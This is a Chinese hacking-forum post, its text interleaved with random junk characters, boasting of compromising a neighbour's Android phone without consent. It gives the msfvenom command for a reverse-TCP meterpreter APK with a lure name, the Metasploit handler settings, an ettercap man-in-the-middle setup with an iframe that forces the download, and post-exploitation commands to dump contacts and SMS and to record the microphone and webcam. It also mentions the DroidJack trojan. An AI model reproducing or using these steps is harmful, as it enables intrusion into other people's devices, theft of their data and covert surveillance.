中国网络渗透测试联盟

标题: metasploit+ettercap中间人攻击成功入侵邻居手机 [打印本页]
作者: admin    时间: 2018-10-20 20:30
标题: metasploit+ettercap中间人攻击成功入侵邻居手机

B/ g$ X" y' h r1 } 五、msf+ettercap入侵邻居安卓手机 * }! g! `: v; L

7 I9 J* e+ c8 D# e

" d7 M4 Y3 A% Q1 z) h8 {* R 首先启动msf 8 q# [8 m ?3 O6 W+ e F

$ V: i: @2 r7 ]7 k& ~5 Z$ {0 f* _$ @

, e+ ~$ F4 U8 v 先用kali生成一个安卓木马,如下命令: ' A3 l# ?& r ^3 x* X* x2 ~

7 U7 l# s7 o# ~& l/ S2 Q7 V* {

* r) C5 G. u9 T1 @1 [ Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk $ u" {. G0 \# ]9 t

+ d2 F3 w" y- b: U' b/ |' c4 j5 U- w

9 T( k$ p' G8 e4 }+ x. a 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 + ?* I( U9 a" `

, u: ^3 J- w7 z% P* Q6 E

+ L! U: Q$ `9 K8 g! C 然后进入msf * d' Y5 Q4 z+ t, W: D8 Y. ^' f

2 d- F+ A& W# b! t4 e# u" o) b

& R" P9 M! x+ T, M use exploit/multi/handler . K5 A* I7 X% R3 k% b# F

8 m/ h9 ~% W& F; E7 | x

( ^" A1 [9 w8 s0 y- H! w; v set payload android/meterpreter/reverse_tcp . t" k8 ^& ^ g3 o2 f2 u' w

& F k0 X0 O. c/ b" ^

4 c: E- l6 M8 i2 |! L* M# ~ set LHOST 192.168.0.109 //ipkailiip 9 V9 o7 D2 y3 d+ w8 ]; h, o) X

; a& z; ?6 ~' M) W+ {5 r/ y

) x4 [: M) V% p' h; j8 q3 y set LPORT 44444 //端口一定要与前面生成的木马的端口一致 $ Q' F% P; t+ n# y

1 F0 Z5 }) Z- U# z! U! I$ n

3 e6 A1 C$ X7 O X+ x Exploit 1 E/ T" o" ]8 V) M

- Q3 M a- i* P4 J

5 J" P/ j& f4 E   ; J2 O; E8 R% t. @

% O7 n. w7 ~- A& k8 _% F# }

) b# V) K. C S6 j, m8 t 下面我们开启ettercap -G 0 p( S' s; [3 Y. V. E

8 I) i2 o! U' g' G8 G8 b Q+ r

: C- K3 ]; c' L# V8 j: c 我物理IP $ g& U. L+ @ u4 B6 [# p) M7 a

. C; j. S% Y) O7 y% D6 Q' |3 k" c

) o( T& r( ^8 w2 A   , u# u# ]' `# v9 `/ l5 y6 a! q

. _/ m9 o2 N; y. |0 O4 I

7 a$ g, Q% n0 @- t/ t; B" C7 W" N 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, # q$ G# D0 ]+ D2 X9 J

+ V$ t' [" t" S

. k& j7 v0 i% g* q 下面我们来设置一下 # `5 h& @; _+ |8 I& A

& J) l( r2 N) c, F9 }$ b# M/ C

. d( e" J8 b# d; z" B8 S5 ?. n   9 U/ `! J7 B( D$ N" }

{2 y6 y+ {# |! i

+ e7 d/ s6 l' Z% J! D. z; O 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, 6 U2 o- ^; q. |4 W7 v

1 N# d( N) U4 j( R# Q

# x( Z* H) W4 \% ?, j5 ?- ]   9 h1 o0 g8 e) y$ y! g9 u" K0 h* i

" E5 K' O' P% K+ Z* c- X( o

5 \2 n; l7 j h9 V! {' U   . O+ p3 r1 R/ ]3 }0 D! X* P0 m2 |

8 c: `2 h& q: I

, \4 V/ H. ?# p) E" p: x* S   : H8 {! l8 k( P, e6 R- I/ `: x

/ D5 D& B5 j( u$ v3 r9 E

9 i- N, O. M* ^, ~   " P* r9 A" ?8 Z0 K! F( U4 p

; Y. z1 G+ Q2 L4 @

, s7 O$ `- J4 c9 Z   4 B7 Y7 H8 ^1 J. U

# m9 v3 u9 g6 A/ u" c) I

& c- K1 F; Q& l) S% B4 C6 u+ K) P# K   4 u/ |8 b% t/ y {0 A2 g3 b) D

& H" v- s3 t7 e

/ @0 k: \" D2 {. p% K5 ?; W5 d   " M& ^# p1 ^* h

; l3 d7 h: G7 {& @

& P. j7 |* W/ C1 m8 H2 Q   % o& s6 }1 z( u+ Q8 v5 w

" ^" _2 V5 W6 y( f0 x

- t" j% e' z. a# U; S M. e   # v( V7 B$ y: r: K2 m0 `% u

5 A9 j9 M3 n: V, ~% p" p3 u: d, p

! j, A* Y. n- \" x7 |0 f   , y' ^0 w5 [. @! c3 B8 C7 H

8 f* R+ p! h, k C

7 p$ l, L e# \3 H, b! o) K   9 v Y+ y' k5 o1 k5 a* Q

: G! ~3 G! B3 C p6 ]

2 M# z/ s5 Q/ d* Y! x1 a( F' R   9 A0 \, [5 T o

4 u! N; C; b" b6 A$ M. V7 ~

( p3 f" B8 v% M6 @6 V# @   ; {. j% ?8 r: y+ I

$ f* H' c3 _$ Q( U" `5 Q% s

7 D, E3 W8 J4 f6 t/ [- i# h 下面我们开始攻击 % k( L1 O1 z3 O% R4 n: Z

! e/ k% ?9 P& y

6 E% ?3 S# Q. C1 A9 j5 Y H5 c   - L% {' g) ]' u4 [

) [: F; E, T* o' t6 j0 A+ M

8 n2 J. X8 L) n2 I# o$ S8 G- o   8 d% F* o$ w x b, M3 @$ C

1 o' L& A: Q5 s! @& ~) n! a

2 L7 y/ R5 q" Z) u1 u; j% |& K   * l3 @$ L1 Z3 R5 ^9 U5 S' `3 G5 ?

5 e# f: k. X' I# q0 Z* Z6 K: Q# D

9 e& h) d( x' v! a   6 o) T& S8 }: Y

7 e8 x6 s2 k. A

+ g i! I& u( [0 n1 d   & E; B! i% z k) d

5 w1 d) X5 [: T. h

9 L0 d0 p4 ^; C1 I n$ `& W2 B 大概过了5分钟多,发现反弹成功了 : O8 ]* z- m$ o# ^+ q0 l! x

+ z1 U: v1 ?! c4 u5 l

8 P* f0 {1 F& X$ d3 t& ^   / r$ H. Y' Q) r; d$ {' N

6 i& q; E3 s( o" E3 F+ J

' A5 [( N/ _( o0 b: A   ( H$ n* P" a. j# G; K! R \

' A' X! f o- \) r) i

% S) E) X$ C) h' X @6 ^   # q" Z9 i9 v( s' F+ d

8 U4 a8 n7 y& }3 S9 D5 c2 Q R/ }

3 ?3 b8 [; U6 u3 ]0 Z4 ~   & _# Z) w5 ^; B$ [, t: T

& r* G) M5 p& @: P& A

2 c( j) s6 V/ b# ?# s) B- i   & m6 ]% Z% z7 i, X5 m

( b( x, G" V: w3 Y+ ]3 m3 X9 L) {

2 b, D2 t: c- ]% }! u, `   : [' U- O% w( }9 I

) {' F( W w3 X5 @

7 m# G) x2 Y- v# y   % ^4 J% D0 G" R8 Q+ N# e. ~

5 m9 l/ `6 x5 u. Y: [

' G$ B/ C% ^( C" M# N4 o 执行命令 9 U' G3 n5 L" R; d

5 I$ W$ c6 N9 H7 K- O

: d8 g$ m# i, ]3 J* f+ C5 |. U   4 y/ @2 F; [& l2 j

2 _5 a+ y4 i5 O" n" s- q

& u$ o5 A6 d1 g: y J dump_contacts    --》这个是导出电话 C F) ?! v a7 z3 a

6 B3 h) S* Q1 v

0 l. n: L; c& A: |5 W, O dump_sms --》这个是导出信息 % T$ u4 q& V; c1 [

. ~7 l" d6 G( y! d% k

" h3 J7 M& F+ z# U3 ^5 x record_mic     Record audio from the default microphone for X seconds " Y* @, r9 |* \( H0 J; D' z! Q

+ {% m! J. [- |! M& v

s; i4 ] o) I6 v' R, b! H# J0 B' e1 b     webcam_chat    Start a video chat ( m# d) u% m2 U2 v# U

% P l U& y( y6 v9 H! ?+ a

, m7 {% U" Y/ e% P     webcam_list    List webcams ! D2 V H! P/ n! B

, _3 J% {0 P2 g5 ?

0 q& ^6 a9 s+ ?+ V r+ \7 V     webcam_snap    Take a snapshot from the specified webcam - n& ~1 Z" l! r7 i N' o$ P M5 U

+ f8 i& U) S1 f1 S- w2 Y

' U8 ^+ {- z9 S9 [# n" J0 B/ Q webcam_stream  lay a video stream from the specified webcam 4 a+ i: O Z6 q+ |" V. @& _8 A6 w

: W3 ^- l) f4 F# ~) L% i" N2 y

2 S# y8 V) k5 l7 H* n, {8 K4 r   7 ]. B9 G2 I! A2 A' _/ r

2 z( b2 m, K4 A" V" e; g6 R

6 d2 c0 B% S7 o( Q# {% n2 q   & x* f. x5 ^" m; n

% Z( f$ F, ?6 ]2 ]. G

9 D, Z) l% B2 `3 ~ I) q 我们打开看一下电话薄, # P! G% N( {! D2 _9 f2 O8 z* w

' k0 [+ b4 P0 w9 z' ~# v+ R# U

1 c+ h/ ^& e* i+ F( [9 g. K   + v% X. o+ D9 K" z

1 u2 D% w4 g" g" B, l" r. M: I9 a

3 t2 Y' {3 D+ p! G   + i) g4 L9 V' p0 E0 \$ W

/ m2 U% ^$ C, _: _

3 J" O* [8 { S, Y   , x/ R& G- n& r$ n% Y+ \

+ O4 J& s9 d) N" A4 S# A# O

, r, X3 Z1 K$ D7 y   ' t9 x F. C+ G k; T4 N9 c

5 p) h, I( M8 }/ c

" R3 I4 T( P/ `; ?   s, U3 n1 p1 B3 J

4 b& P, J; l) o8 ^: p+ U

7 E) e+ }/ [( |, ?   2 i p' s0 ]( z4 c5 Z/ p8 Q3 D0 ?$ z

; Y0 T! {; t6 y7 Y+ O9 p

" }6 b7 @. V& Y( {% F- Q0 ^ 我们同时欺骗成DroidJack木马,使用方法如图: / d4 b# D( i* I, S7 ^

9 [" j0 V+ W( I( C/ R

* }# B1 r. x0 s   $ E! J y8 p2 ~$ l) X

& k& n/ [/ h `" {" H3 P/ S

, w5 a' V: |& B) J' b   4 L3 t7 H9 l3 B4 P; P

2 x) l d% G. x' P

! z2 I& y- h( _" G8 y   1 y$ a5 j4 h% P' t; o% X& l5 I! b

; i: ?9 [7 q6 t! S

; [, O" |) D/ Y3 }7 S" I+ z 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 , ~9 F/ H& M8 Y

3 x0 }& ^. E. m! Y1 f

8 ?; I: m/ A% ~; L2 A   # v9 f& @2 ]3 P6 E8 t5 t! k

! a; H9 F. r6 I8 `3 e, Q

0 D! Z; {* O" ]3 y2 W   * v6 f5 [3 V/ C

7 Q. T! L3 T" x# Y1 T2 r8 E# G

" S" l4 }- a. n   5 { V7 ~- I# U6 l

6 d. \# H0 K& f: r+ N* Q& \) n

+ M, A {7 f9 [, \ : r, k% D" i/ o

* F/ q' k U! ?4 D2 L4 f. }

7 a. A; r% j. x6 ~. ?9 J2 V5 P: E
2 y# f* x9 e* e) R% s) n





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2